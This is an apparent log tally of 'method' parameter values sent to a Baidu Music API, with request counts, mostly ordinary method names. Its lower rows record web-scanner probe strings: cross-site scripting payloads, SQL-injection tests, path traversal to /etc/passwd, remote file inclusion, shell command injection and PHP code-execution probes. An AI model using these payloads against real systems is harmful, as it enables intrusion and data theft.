baidu.ting.song.getInfos	64941475
baidu.ting.song.baseInfo	30037896
baidu.ting.search.lrcpic	24804291
baidu.ting.search.catalogSug	21323090
baidu.ting.user.listenAge	17919908
baidu.ting.song.play	16781921
baidu.ting.search.common	16377849
baidu.ting.song.down	9159792
baidu.ting.song.lry	7132417
baidu.ting.billboard.billList	6527939
baidu.ting.song.getInfo	5868661
baidu.ting.user.getUserBaseInfo	5815588
baidu.ting.user.checkSuggestVersion	5749887
baidu.ting.search.getPhotoInfos	5696539
baidu.ting.search.lrcys	5588293
baidu.ting.artist.getSongList	5475571
baidu.ting.artist.getList	5112744
ting.baidu.diy.getPlaylists	4644413
baidu.ting.plaza.getFocusPic	4339539
baidu.ting.diy.getNowOfficalList	3751438
baidu.ting.game.gamedetail	3481705
baidu.ting.user.checkComVersion	3201664
baidu.ting.plaza.getRecommendAlbum	3189391
baidu.ting.diy.gedanInfo	2992403
baidu.ting.plaza.active	2772030
baidu.ting.artist.getInfo	2536429
baidu.ting.radio.playAction	2433174
baidu.ting.active.start	2329770
baidu.ting.user.config	2034472
baidu.ting.diy.gedanHot	1715415
baidu.ting.artist.getinfo	1516179
baidu.ting.search.suggestion	1442435
baidu.ting.favorite.isCollect	1360603
baidu.ting.diy.category	1331276
ting.baidu.plaza.recdaily	1314683
baidu.ting.favorite.getCollectSong	1280025
baidu.ting.radio.getChannelSong	1264461
baidu.ting.diy.getSongFromOfficalList	1255592
baidu.ting.album.getAlbumInfo	1171398
baidu.ting.diy.addListenCount	1031288
baidu.ting.plaza.getPartDesc	1029186
baidu.ting.plaza.recdaily	976975
baidu.ting.song.playAAC	934303
baidu.ting.artist.getAlbumList	861447
baidu.ting.song.audio	784562
baidu.ting.user.RegistToImsg	727213
baidu.ting.tag.songlist	715982
baidu.ting.diy.gedan	709986
baidu.ting.tag.getHotTag	649719
	573161
baidu.ting.user.down	521291
baidu.ting.radio.getCategoryList	472426
baidu.ting.feedback.song	409651
baidu.ting.billboard.billCategory	365929
baidu.ting.search.lrcyss	354129
baidu.ting.search.getPhotoInfo	339299
baidu.ting.artist.get72HotArtist	319411
baidu.ting.diy.getPlaylists	274636
baidu.ting.favorite.getFavoriteSong	209803
baidu.ting.plaza.recommend	185924
baidu.ting.song.buffer	182809
baidu.ting.video.getList	165669
baidu.ting.game.gamelist	145432
baidu.ting.favorite.addSongFavorites	126613
baidu.ting.song.getMulInfos	121350
baidu.ting.tag.getAllTag	113165
baidu.ting.diy.search	109643
baidu.ting.diy.getSimilarGedan	107879
baidu.ting.diy.getOfficialDiyList	97320
baidu.ting.video.play	78794
baidu.ting.user.checkVersion	65653
baidu.ting.favorite.addSongFavorite	63280
baidu.ting.artist.getSpecialSongList	58628
baidu.ting.plaza.getNewSongs	50611
baidu.ting.favorite.delCollectSong	44177
ting.baidu.diy.getPlaylist	31657
baidu.ting.radio.getArtistChannelSong	30057
baidu.ting.radio.getFavoriteSong	25326
baidu.ting.plaza.getArtistPlaza	21028
baidu.ting.radio.serv	19489
baidu.ting.diy.getPlaylist	18911
baidu.ting.artist.getHighSongTitle	15206
baidu.ting.feedback.crash	14215
baidu.ting.album.getList	12857
baidu.ting.diy.saveList	11598
baidu.ting.favorite.delSongFavorite	9666
ting.baidu.film.getFilmInfo	9517
baidu.ting.song.cloud	9445
baidu.ting.user.nplogin	7381
baidu.ting.artist.getQianQianArtist	7216
baidu.ting.song.getMulInfo	7207
baidu.ting.video.category	5338
baidu.ting.diy.delListSong	5204
baidu.ting.diy.addListSong	5036
baidu.ting.user.logout	4813
baidu.ting.weixin.response	4689
baidu.ting.diy.delList	4554
baidu.ting.user.regPassport	4498
ting.baidu.artistapp.renum	4412
baidu.ting.colorRing.listen	3699
baidu.ting.billboard.catalog	3694
ting.baidu.song.lry	3431
baidu.ting.artist.getHighSongList	3218
baidu.ting.user.getMobileVcode	2827
baidu.ting.colorRing.getCode	2639
baidu.ting.user.registToUC	2487
baidu.ting.colorRing.authset	2232
baidu.ting.favorite.delSongFavorites	1902
baidu.ting.favorite.getFavoriteAlbum	1719
baidu.ting.feedback.info	1645
baidu.ting.diy.getRecommendSpeical	1440
baidu.ting.artist.getSongRank	1407
baidu.ting.artist.getSong	1399
baidu.ting.user.getMessage	1382
baidu.ting.diy.upList	1060
ting.baidu.artistapp.brief	1014
baidu.ting.artist.getSongVote	985
baidu.ting.favorite.getListenHistory	904
baidu.ting.diy.addList	840
baidu.ting.game.catalog	784
baidu.ting.video.recMv	583
baidu.ting.favorite.getOffenListenList	541
baidu.ting.game.gameplay	455
baidu.ting.colorRing.subscribe	443
baidu.ting.song.getSuoSongInfo	411
baidu.ting.artist.getInfoByName	364
baidu.ting.artistapp.photo	344
baidu.ting.user.activate	329
baidu.ting.colorRing.toneselect	321
baidu.ting.favorite.getInfoFromView	194
baidu.ting.user.login	175
baidu.ting.mv.playMV	164
baidu.ting.favorite.addAlbumFavorite	137
baidu.ting.song.getHash	131
baidu.ting.plaza.getMisNewSong	128
ting.baidu.artistapp.newList	125
ting.baidu.artistapp.news	110
baidu.ting.mv.searchMV	82
ting.baidu.artistapp.briefs	75
baidu.ting.favorite.delAlbumFavorite	69
baidu.ting.user.addPassportInfo	56
baidu.ting.mv.getIndexMV	42
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	30
(	24
\' (	24
baidu.ting.album.getAlbumstyle	24
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	12
ting.baidu.user.registToUC	11
baidu.ting.outerPassport.profile	9
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	9
http://cirt.lnet/rfiinc.txt_	8
file:///etc/passwd	8
../../../../../../../../../../etc/rc.d/rc.local_	8
../../../../../../../../../../etc/rc.d/rc.local	8
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	8
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	8
http://cirt.lnet/rfiinc.txt	8
../../../../../../../../../../etc/passwd_	8
set	8
${@print(md5(812812))}	8
file:///etc/rc.d/rc.local_	8
baidu.ting.song.play\';alert(1);\'	8
c:/windows/win.ini	8
/usr/bin/id;	8
1\\\";cat /etc/rc.d/rc.local;\\\"	8
file:///etc/rc.d/rc.local	8
../../../../../../../../../../etc/passwd	8
file:///etc/passwd_	8
string:{var_dump(md5(812812))}	8
1;cat /etc/rc.d/rc.local;	8
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	8
c:/windows/win.ini_	8
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	8
%{	8
${	8
\'];${@print(md5(812812))};//	8
1\';cat /etc/rc.d/rc.local;\'	8
baidu.ting.mv.getMVCategory	6
baidu.ting.song.lry\';alert(1);\'	6
baidu.ting.mv.getMultiSongMVInfo	6
ting.baidu.search.common	6
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.php	4
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	4
baidu.ting.song.play</script><script>alert(1);//	4
baidu.ting.song.play<script>confirm(1)</script>	4
baidu.ting.song.play\') and 8288=8288 and (\'	4
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	4
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	4
baidu.ting.song.play\' and \'8281\'=\'8281	4
baidu.ting.song.playjavascript:alert(1)	4
baidu.ting.song.play\'\";alert(1);//	4
baidu.ting.song.play\";alert(1);\"	4
baidu.ting.song.play;alert(1);//	4
ting.baidu.artistapp.send	4
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	4
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	4
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	4
baidu.ting.song.play</textarea></title><script>alert(1)</script>	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	4
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	4
baidu.ting.song.play--></script><script>alert(1)</script>	4
baidu.ting.song.play>\'>\"><script>alert(1)</script>	4
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	3
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	3
baidu.ting.song.lry</script><script>alert(1);//	3
baidu.ting.song.lry<script>confirm(1)</script>	3
../../../../../../../../../../etc/passwd_.jpeg	3
../../../../../../../../../../etc/passwd_.htm	3
baidu.ting.song.lryjavascript:alert(1)	3
file:///etc/passwd_.jpg	3
baidu.ting.song.lry\'\";alert(1);//	3
http://cirt.lnet/rfiinc.txt_.html	3
baidu.ting.song.lry\";alert(1);\"	3
baidu.ting.song.lry;alert(1);//	3
file:///etc/rc.d/rc.local_.php	3
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	3
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	3
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	3
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	3
c:/windows/win.ini_.jpeg	3
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	3
baidu.ting.artist.getSongListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.lry--></script><script>alert(1)</script>	3
../../../../../../../../../../etc/rc.d/rc.local_.html	3
	2
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.song.lry\') and 8288=8288 and (\'	2
../../../../../../../../../../etc/passwd_.php	2
baidu.ting.artist.getSongList\';alert(1);\'	2
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	2
baidu.ting.song.lry\' and \'8281\'=\'8281	2
file:///etc/passwd_.htm	2
c:/windows/win.ini_.php	2
http://cirt.lnet/rfiinc.txt_.jpeg	2
http://10.42.7.217/?1383947659.11	2
http://10.42.7.217/?1383919669.69	2
http://10.42.7.217/?1383917186.49	2
http://10.42.7.217/?1383915472.27	2
http://10.42.7.217/?1383909083.16	2
http://10.42.7.217/?1383909082.62	2
http://cirt.lnet/rfiinc.txt_.php	2
file:///etc/rc.d/rc.local_.jpeg	2
file:///etc/rc.d/rc.local_.jpg	2
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	2
../../../../../../../../../../etc/rc.d/rc.local_.php	1
../../../../../../../../../../etc/rc.d/rc.local_.jpg	1
../../../../../../../../../../etc/rc.d/rc.local_.htm	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpeg	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.html	1
baidu.ting.artist.getSongList\' and \'8281\'=\'8281	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	1
baidu.ting.artist.getSongList(\')\'))(\")\'\"\"\"\")	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	1
baidu.ting.artist.getSongListjavascript:alert(1)	1
baidu.ting.plaza.getFocusPia	1
baidu.ting.artist.getSongList\'\";alert(1);//	1
baidu.ting.plaza.getDocusPic	1
baidu.ting.sgid=18297988	1
baidu.ting.artist.getSongList\";alert(1);\"	1
baidu.ting.artist.getSongList;alert(1);//	1
baidu.ting.search.suggestio	1
file:///etc/passwd_.php	1
baidu.ting.push.send	1
c:/windows/win.ini_.jpg	1
http://cirt.lnet/rfiinc.txt_.jpg	1
baidu.ting.diy.getPreOfficalList	1
file:///etc/rc.d/rc.local_.html	1
baidu.ting.radio.getChann	1
c:/windows/win.ini_.htm	1
baidu.ting.user.checkSuggestVer	1
baidu.ting.artist.getSongList\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
baidu.ting.artist.getSongList\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baiducom	1
baidu.ting.artist.getSongList<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
baidu.ting.user.checkSugges2.1	1
file:///etc/passwd_.jpeg	1
baidu.ting.artist.getSongList\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	1
baidu.ting.artist.getSongList</textarea></title><script>alert(1)</script>	1
baidu.ting.artist.getAlbumListmethod=baidu.ting.artist.getAlbumList	1
baidu.ting.artist.getSongList--></script><script>alert(1)</script>	1
baidu.ting.song.getInhxcPfrvm FiksF1HbIw3qlDBE/PypSTxub2LR6PqGpI=	1
baidu.ting.artist.getSongList>\'>\"><script>alert(1)</script>	1
baidu.ting.artist.getSongList\"><img src=1 onerror=alert(1)>	1
baidu.ting.artist.getSongList%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.artist.getSongList</script><script>alert(1);//	1
baidu.ting.artist.getSongList<script>confirm(1)</script>	1
baidu.ting.artist.getSongList\') and 8288=8288 and (\'	1
file:///etc/passwd_.html	1
c:/windows/win.ini_.html	1
baidu.tion	1
baidu.ting.artist.getSongListformat=jsontinguid=88025907limits=50order=2offset=0from=iosversion=4.3.0from=ios	1
